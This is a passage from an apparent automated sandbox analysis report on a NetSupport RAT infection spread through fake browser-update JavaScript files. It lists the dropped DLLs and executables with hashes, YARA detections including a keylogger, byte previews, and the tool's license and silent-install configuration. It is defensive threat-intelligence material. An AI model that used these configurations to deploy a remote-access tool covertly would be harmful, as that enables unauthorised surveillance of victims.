Match: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLL
Update.js | malicious | NetSupport RAT
update.js | malicious | NetSupport RAT
updates.js | malicious | NetSupport RAT
updates.js | malicious | NetSupport RAT
Update 124.0.6367.158.js | malicious | NetSupport RAT
updates.js | malicious | NetSupport RAT
Update 124.0.6367.158.js | malicious | NetSupport RAT
Update_124.0.6367.158.js | malicious | NetSupport RAT
MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip | malicious | NetSupport RAT
update.js | malicious | NetSupport RAT
                                                                            Process:C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:modified
                                                                            Size (bytes):16
                                                                            Entropy (8bit):3.077819531114783
                                                                            Encrypted:false
                                                                            SSDEEP:3:llD:b
                                                                            MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                            SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                            SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                            SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:40.7357,-74.1724
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):19008
                                                                            Entropy (8bit):5.5024520238798695
                                                                            Encrypted:false
                                                                            SSDEEP:384:V8kjr8ZMuAhPJfst2UBvJ6X1qabssp2e6f05hwTwmp14toaNfbh69By:eWr0Mbv6QX1qaBAezXk1ebhz
                                                                            MD5:C0AB16AD9B9DE78D6F3C8B234A42D878
                                                                            SHA1:B6B27A86BBDD2307224C9C9B5F5A602484C994E1
                                                                            SHA-256:FB48083C23606C18C9ABC12AFDFD28BF89F4F9F04E871A0BFDDE57A73BE2A2B4
                                                                            SHA-512:ADACE36191CC92D852BE3930643373EA45C08DCA33FE03FDE9489F445910F442412E675888CC54046C0EF2C945B835436C22E925C311A657EC62BA115297C43B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:@...e..............."................................@..........H...............o..b~.D.poM...3..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....`.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):2277965
                                                                            Entropy (8bit):7.997315044740122
                                                                            Encrypted:true
                                                                            SSDEEP:49152:a51ZlWlEDThXBJOhHvh6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRRakTSA:E17FXa/hRFY89YYc9jh23redpmQR5
                                                                            MD5:951A4904B64B991D1834CFECE9EFC1DC
                                                                            SHA1:52EDF0F5A1E24F0B988E84F738544750F9CF2248
                                                                            SHA-256:A685F2AB98075CE17B87C6F1E5A0160AB556DFEC6F9ACE0CDD7EE48D57CBD2D3
                                                                            SHA-512:806DC4D3386B76601D1A062DB6784BA8DF760784FB7F0AF8B5A878A0D27120C69C6E6C48B68F13E23FC95BD83EBD3BCBADFD5637877F9F089A205848DBF3B345
                                                                            Malicious:false
                                                                            Preview:PK.........DWW..%.&l..........client32.exe.|.xT.....N..".R....A.W..@........Tj.$...Q.@... ...7!...@..iJ.......;3....R..~.....;g...3gfnx...T.@......b../....d.@...n{...ts....5d.....]%.i..v...:3lZ..i]G.9v.:...\__...F.).C....(..B..t..P.f....&..9..e.k9.:.K.X...8..`.@...Oph.@W...B.p....N.]A.....A^...!..Y..T...+..t........`..KUg.....`..]w..=k...g...7.......4<..=f..|..8T.."...z..:..ae>s.L.(....f.U.%=.).Iq.....T..px-..8G.G...`8.>{#.=....&B..G..)t........uY:R0..C.....C.........G......1r.e..K5HMop..ZJ..6.&...fM.........m....G..W.I0....hb.."NDS5...>MTz-.".i.....v..[..JC.dC........^4....4.W.U.SZ.'..........O...C.O.+..X...Cs.)S.L`3'8t.....Y..Te....~aS.G...M......9..g......0}.|-.;..N%....Hi......$.....kC..t..`..,..!&..X..$.6k..v....o_.I.......x......?_..'.A..../`S.b...u.].....t..9.6...g.l..|.2...Nte.}.N....]........)d..Q{.>g.p?G.O...g.......S.Z*.-.....^.......[......V..i...V.oh.~l+......R9.}W.F..q....4...._`G.CK..u.@l.....7l.W/..b.&... H.1..I.........
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):328056
                                                                            Entropy (8bit):6.7547459359511395
                                                                            Encrypted:false
                                                                            SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                            MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                            SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                            SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                            SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                            Joe Sandbox View:
                                                                            • Filename: Update.js, Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):24504
                                                                            Entropy (8bit):7.872865717955356
                                                                            Encrypted:false
                                                                            SSDEEP:384:qSVmAf6Ft8Itb+e2b9tdTwEy9kXs6vWZZCbiXSeEO/12Hb40yrWSbN8qtA:qImAfe7gx3y6MZC2CeV2747zbN8
                                                                            MD5:B8F553FBD3DC34B58BC77A705711023D
                                                                            SHA1:4AB1052F906FDA96F877E398426DA5646574C878
                                                                            SHA-256:2761C60263A2919B856915BDD2A0604B7F0E56E59D893AB13CCCEF2B7C967229
                                                                            SHA-512:15A1DF0DBB06B4BB64A2B8CD7AD22578292D5ECDEC64303350E027F9F87FA8A825CB1CC97F94862D8C235C85B0C79A4FEABFB89D9E0B77BE62AAB25785122A60
                                                                            Malicious:false
                                                                            Preview:.PNG........IHDR...X...X......f...._.IDATx........................................................................................................................................................................................................................................................f...:.(L..A!..].'twW..3.2 ..........'k.]Kd.|...mz..U...Tu.L..~.W.Wc......................rv.iv%.q=....u..>.o.......k.y.wo........ .,...~..U..._.7/g.........m.....*w.`........p.....8...q.,.,.g....:Q.Rt....Ga.............Z..S+.....=.,....T.Ew.....0U..`.....S.......w....Va..#.|Mo.....eY.eY....m^....r.P..S{#......D.I.y..K.&&9....@...u.^...D.....U..l.keY.eY....rv.]..H..A....^..RpQ.)@,.Im..s.~.U.....,j....._m?.V...z95l}.,.,.P....b..R.>rV.Q_m.0....(.b..@.,./.T[.S;.X....`..w.,...j.o..M.......~^......0.8.....$][=`.V.)..O..1....+...3...eY.e.[.]....s...z.E\.I!G..;).'...d.m>..+w.M.=X.S......g.o.~0........j.{.hY.eY.7.................G..e(K...y..IL.F)g..{.....Z.J}...qn..+.%
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):195
                                                                            Entropy (8bit):4.924914741174998
                                                                            Encrypted:false
                                                                            SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                            MD5:E9609072DE9C29DC1963BE208948BA44
                                                                            SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                            SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                            SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                            Malicious:true
                                                                            Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Generic INItialization configuration [Features]
                                                                            Category:dropped
                                                                            Size (bytes):6458
                                                                            Entropy (8bit):4.645519507940197
                                                                            Encrypted:false
                                                                            SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                            MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                            SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                            SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                            SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                            Malicious:false
                                                                            Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):18808
                                                                            Entropy (8bit):6.292094060787929
                                                                            Encrypted:false
                                                                            SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                            MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                            SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                            SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                            SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                            Joe Sandbox View:
                                                                            • Filename: Update.js, Detection: malicious
                                                                            • Filename: update.js, Detection: malicious
                                                                            • Filename: updates.js, Detection: malicious
                                                                            • Filename: updates.js, Detection: malicious
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                            • Filename: updates.js, Detection: malicious
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                            • Filename: Update_124.0.6367.158.js, Detection: malicious
                                                                            • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious
                                                                            • Filename: update.js, Detection: malicious
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3740024
                                                                            Entropy (8bit):6.527276298837004
                                                                            Encrypted:false
                                                                            SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                            MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                            SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                            SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                            SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLL, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):2463
                                                                            Entropy (8bit):4.467188346618147
                                                                            Encrypted:false
                                                                            SSDEEP:48:XZfQr+iDzuMbRmWf2/wu8I6nzsCEak0V9OTG3NOirrY:XZ473RBfiw/HzsCH9o/yY
                                                                            MD5:326DDFFC1F869B14073A979C0A34D34D
                                                                            SHA1:DF08E9D94AD0FAD7CC7D2D815EE7D8B82EC26E63
                                                                            SHA-256:D4201EFD37AEC4552E7AA560A943B4A8D10D08AF19895E6A70991577609146FB
                                                                            SHA-512:3822E64CA9CF23E50484AFCC2222594B4B2C7CD8C4E411F557ABEA851AE7CBD57F10424C0C9D8B0B6A5435D6F28F3B124C5BC457A239F0A2F0CAF433B01DA83F
                                                                            Malicious:false
                                                                            Preview:4dex.io/.ebaystatic.com/.widespace.com/.trafficjunky.net/.minutemedia-prebid.com/.programattik.com/.00px.net/.tsyndicate.com/.ownpage.fr/.ansira.com/.bfmio.com/.adsquare.com/.smct.io/.fengkongcloud.com/.pubwise.io/.admixer.net/.kameleoon.eu/.adelement.com/.fksnk.com/.ie8eamus.com/.aniview.com/.audrte.com/.insurads.com/.brid.tv/.polarcdn-pentos.com/.6sc.co/.ad.gt/.adskeeper.com/.cheqzone.com/.hybrid.ai/.adentifi.com/.cloud-media.fr/.justpremium.com/.refersion.com/.commander1.com/.cootlogix.com/.selectmedia.asia/.sddan.com/.a-mo.net/.2mdnsys.com/.presage.io/.2trk.info/.adnet.de/.dynata.com/.bidtheatre.com/.ufpcdn.com/.curalate.com/.digitaleast.mobi/.moatpixel.com/.yellowblue.io/.datamind.ru/.bumlam.com/.relevant-digital.com/.medialead.de/.iivt.com/.flux.jp/.adtelligent.com/.fqtag.com/.adalliance.io/.wpncdn.com/.webvisor.org/.kameleoon.io/.playwire.com/.visx.net/.gnezdo.ru/.otto.de/.socdm.com/.snigelweb.com/.powerad.ai/.kitewheel.com/.affec.tv/.basis.net/.servenobid.com/.tappx.com/.indexw
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):48
                                                                            Entropy (8bit):4.178175262485106
                                                                            Encrypted:false
                                                                            SSDEEP:3:hV23fASC+3A52IF3:f23x3AoI5
                                                                            MD5:7B0B4A9AAFC18CF64F4D4DAF365D2D8D
                                                                            SHA1:E9ED1ECBEC6CCCFEFE00F9718C93DB3D66851494
                                                                            SHA-256:0B55EB3F97535752D3C1EF6CEBE614B9B67DDDFCFD3C709B84C6ECAD6D105D43
                                                                            SHA-512:A579069B026ED2AAEF0BD18C3573C77BFB5E0E989C37C64243B12EE4E59635AAA9D9C9746F82DCC16CA85F091EC4372C63E294C25E48DFFFBED299567149C4E2
                                                                            Malicious:false
                                                                            Preview:my.mail.ru/.content-tracker.msedgedemo.example/.
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):32
                                                                            Entropy (8bit):3.952819531114783
                                                                            Encrypted:false
                                                                            SSDEEP:3:OLAbIW02IF3:OEIII5
                                                                            MD5:4EC1EDA0E8A06238FF5BF88569964D59
                                                                            SHA1:A2E78944FCAC34D89385487CCBBFA4D8F078D612
                                                                            SHA-256:696E930706B5D391EB8778F73B0627FFC2BE7F6C9A3E7659170D9D37FC4A97B5
                                                                            SHA-512:C9B1ED7B61F26D94D7F5EDED2D42D40F3E4300EEE2319FE28E04B25CDB6DD92DAF67828BFF453BF5FC8D7B6CEB58CAB319FC0DAAC9B0050E27A89EFE74D2734E
                                                                            Malicious:false
                                                                            Preview:cryptominer.msedgedemo.example/.
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):172
                                                                            Entropy (8bit):4.35640367318307
                                                                            Encrypted:false
                                                                            SSDEEP:3:OL0iGKKGvJMM3fvaIDOGTKvWAXW/LK0KEExV5VZmLVrXLU52IF3:A06v+MfrCG1/LKjPVZMFLUoI5
                                                                            MD5:3852430540E0356D1BA68F31BE011533
                                                                            SHA1:D3F622450BCF0CED36D9D9C0AAD630EBCCFCB7FF
                                                                            SHA-256:F1F413704C32A28A31A646F60CAD36CC2DA793E143F70EEE72AE56F736DF8054
                                                                            SHA-512:7A4FAA493C141EA88D6CD933DFC0B50EF6D25983323DB2B931C7512E039859D60C4935E56B771264CA72B45C035B1962AD8680D616EAAF04FBC5A6E0B674E435
                                                                            Malicious:false
                                                                            Preview:zadn.vn/.ansira.com/.fcmatch.google.com/.origo.hu/.fcmatch.youtube.com/.refersion.com/.flocktory.com/.vtex.com.br/.rqtrk.eu/.vocento.com/.fingerprinter.msedgedemo.example/.
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):66
                                                                            Entropy (8bit):3.99590382426697
                                                                            Encrypted:false
                                                                            SSDEEP:3:aeBX+4AuXEJOpKPudp:3XVAuXEs+udp
                                                                            MD5:5B7BAF861A48C045D997992424B5877B
                                                                            SHA1:2B2BD9A13AFE49748ABF39FAF9EB29ED658F066E
                                                                            SHA-256:44071E0FCFFB9A9A32E8FA7010BB18DBC41AFD0B176F81BF700B15B638A88A51
                                                                            SHA-512:4820B41AA5FF4D934A583E1F0B93B1512631102BB2DFDB74792A2F0DCF9907DA7680C02A5DDD2492A1E6D58CDADA3453D9E38BB8DEAB6CE831FF36A7F8DE016C
                                                                            Malicious:false
                                                                            Preview:Licensed under a separate commercial license from Disconnect, Inc.
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):91
                                                                            Entropy (8bit):4.207916880795248
                                                                            Encrypted:false
                                                                            SSDEEP:3:k5Ks3OGTKv+vJKS8XWA3A52IF3:Fs+G7v4SVA3AoI5
                                                                            MD5:09CEDAA60EAB8C7D7644D81CF792FE76
                                                                            SHA1:E68E199C88EA96FCB94B720F300F7098B65D1858
                                                                            SHA-256:C8505EA2FE1B8F81A1225E4214AD07D8D310705BE26B3000D7DF8234E0D1F975
                                                                            SHA-512:564F8E5C85208ADABB4B10763084B800022BB6D6D74874102E2F49CC8F17899CE18570AF1F462AA592A911E49086A2D1C2D750B601EEDD2F61D1731689A0A403
                                                                            Malicious:false
                                                                            Preview:dartsearch.net/.fcmatch.youtube.com/.fcmatch.google.com/.other-tracker.msedgedemo.example/.
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):16528
                                                                            Entropy (8bit):4.551178727174085
                                                                            Encrypted:false
                                                                            SSDEEP:384:lMFqdq0kM55olQws9gsLW4nMFCw8oaj7CQB:lGOqPM5mlQXgeWaMFvanCs
                                                                            MD5:39BDF35AC4557A2D2A4EFDEEB038723E
                                                                            SHA1:9703CA8AF3432B851CB5054036DE32F8BA7B083F
                                                                            SHA-256:04441A10B0B1DEEE7996E298949AC3B029BD7C24257FAF910FE14F9996BA12AE
                                                                            SHA-512:732337F7B955E6ACAF1E3AAA3395BC44C80197D204BD3CBB3E201B6177AF6153CC9D7B22AD0E90B36796F92B0022806C32AC763EAEC733B234503890900BF284
                                                                            Malicious:false
                                                                            Preview:aboardlevel.com/.cushiondrum.com/.connectad.io/.attractionbanana.com/.klevu.com/.stripchat.com/.360.cn/.barbarousbase.com/.tailtarget.com/.spottednoise.com/.kickfire.com/.createsend24.com/.dampdock.com/.equablekettle.com/.cmail18.com/.blesspizzas.com/.p7cloud.net/.smadex.com/.responder.co.il/.condemnedcomb.com/.aquaticowl.com/.operationchicken.com/.baitbaseball.com/.cumbersomecarpenter.com/.scrapesleep.com/.clammychicken.com/.6sense.com/.unwieldyplastic.com/.sailthru.com/.gondolagnome.com/.shakysurprise.com/.impactcdn.com/.ancientact.com/.maillist-manage.in/.bushesbag.com/.rmtag.com/.mkt8628.com/.faultycanvas.com/.fewkittens.com/.createsend6.com/.cartkitten.com/.cmail12.com/.fixedfold.com/.cmail21.com/.strangeclocks.com/.lunchroomlock.com/.stimulatingsneeze.com/.conditioncrush.com/.crimsonmeadow.com/.combcompetition.com/.mkt8586.com/.motionflowers.com/.a-mx.com/.combcattle.com/.opti-digital.com/.sundaysky.com/.aliveachiever.com/.actuallything.com/.knottyswing.com/.damagedadvice.com/.ak
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):396664
                                                                            Entropy (8bit):6.80911343409989
                                                                            Encrypted:false
                                                                            SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                            MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                            SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                            SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                            SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 6%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):103824
                                                                            Entropy (8bit):6.674952714045651
                                                                            Encrypted:false
                                                                            SSDEEP:768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
                                                                            MD5:C4F1B50E3111D29774F7525039FF7086
                                                                            SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                                                                            SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                                                                            SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                                                                            Malicious:true
                                                                            Yara Hits:
